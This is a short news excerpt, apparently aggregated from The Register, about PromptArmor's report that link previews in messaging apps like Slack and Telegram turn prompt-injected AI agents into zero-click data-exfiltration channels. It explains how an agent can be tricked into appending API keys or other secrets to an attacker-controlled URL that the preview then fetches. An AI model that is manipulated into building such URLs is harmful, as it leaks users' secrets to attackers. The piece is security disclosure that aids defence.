"Messaging apps commonly use link previews, which let the app query links dropped in a message to extract a title, description, and thumbnail to display in place of a plain URL. As discovered by AI security firm PromptArmor, link previews can turn URLs generated by an AI agent and controlled by an attacker into a zero-click data-exfiltration channel, allowing sensitive information to be leaked without any user interaction."
"As PromptArmor notes in its report, indirect prompt injection via malicious links isn't unheard of, but typically requires the victim to click a link after an AI system has been tricked into appending sensitive user data to an attacker-controlled URL. When the same technique is used against an AI agent operating inside messaging platforms such as Slack or Telegram, where link previews are enabled by default or in certain configurations, the problem gets a whole lot worse."
"Without a link preview, an AI agent or a human operator has to follow a link, triggering a network request after the AI system has been tricked into appending sensitive user data to an attacker-controlled URL. As mentioned, this type of prompt injection attack can extract various types of sensitive data, such as API keys and the like, by tricking an AI agent into appending the info onto the URL."
AI agents in messaging platforms can be manipulated to generate attacker-controlled URLs that include sensitive user data. Messaging apps often fetch link previews by querying links to extract metadata, which can cause the platform to request attacker-controlled URLs automatically. That automatic fetching turns manipulated URLs into zero-click data-exfiltration channels capable of leaking secrets without user interaction. Traditional prompt-injection attacks typically required a user or agent to click a link to trigger exfiltration. Agentic systems with link previews worsen the threat by enabling immediate leakage when the AI agent posts the URL. Extractable data includes API keys and other sensitive information.
Read at Theregister
Unable to calculate read time
Collection
[
|
...
]